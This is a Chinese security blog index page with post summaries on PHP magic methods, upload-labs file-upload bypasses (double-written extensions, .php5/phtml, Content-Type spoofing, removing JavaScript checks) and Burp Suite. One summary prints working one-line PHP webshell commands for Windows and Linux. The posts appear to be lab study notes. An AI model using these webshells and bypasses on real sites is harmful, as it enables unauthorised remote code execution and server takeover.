所有严重的威胁都来自于人们对细微之处的忽视|

iZero

园龄:6年6个月粉丝:0关注:1

PHP魔术方法笔记
摘要: 前言 在 PHP 中,以双下划线__开始命名的方法被称作 PHP 中的魔术方法,它们在 PHP 中充当很重要的角色。 常见的魔术方法有: __construct():构造函数 __destruct():析构函数 __get(): 访问不存在的成员变量时调用 __set():设置不存在的成员变量时调用
33
0
0
文件上传漏洞之过滤敏感文件扩展名
摘要: 双写绕过:把filename.php修改为filename.pphphp 过滤掉php后就会变成filename.php
629
0
0
文件上传漏洞之黑名单验证
摘要: pass-03 只禁止了部分扩展名,还有.php5等扩展名可以解析为PHP。 上传.php5即可。 类似的扩展名有:php2,php3、php4、php5、phtml、等
541
0
0
文件上传漏洞之MIME类型过滤
摘要: 上传的时候修改Content-Type为image/jpeg等程序指定的类型即可。 修改为: 使用蚁剑连接测试
640
0
0
命令执行写马的正确方式
摘要: Windows 错误写马 正确姿势 echo ^<?php @eval($_POST[cmd]);?^> > ./iii.txt Linux 正确写马方式 echo "<?php @eval(\$_POST['cmd']); ?>" > ./1.php
1569
0
1
无状态子域名爆破工具:ksubdomain
摘要: 概述 开源地址:https://github.com/knownsec/ksubdomain 二进制文件下载:https://github.com/knownsec/ksubdomain/releases 在linux下,还需要安装libpcap-dev,在Windows下需要安装WinPcap,m
1667
0
0
burpsuite中文乱码问题
摘要: burpsuite中文乱码问题,无法匹配中文
10009
0
0
文件上传漏洞之js验证
摘要: 0x00 前言 只有前端验证=没有验证 0x01 剔除JS 打开burpsuite,进入Proxy的Options,把Remove all JavaScript选上。 设置浏览器代理直接上传PHP木马即可。 0x02 上传截断修改扩展名 把PHP木马修改为jpg格式,然后上传,用burpsuite截
656
0
0
文件上传漏洞靶机upload-labs(1到10)
摘要: upload-labs,上传漏洞,一句话木马
1244
0
0
URI/URL/URN都是什么
摘要: URI : Uniform Resource Identifier,统一资源标志符 URL : Universal Resource Locator,统一资源定位符 URN : Universal Resource Name,统一资源名称 比如: ,是无痕安全团队的网站图标链接,它是一个URL,也是
424
0
0
点击右上角即可分享
微信分享提示
深色
回顶
展开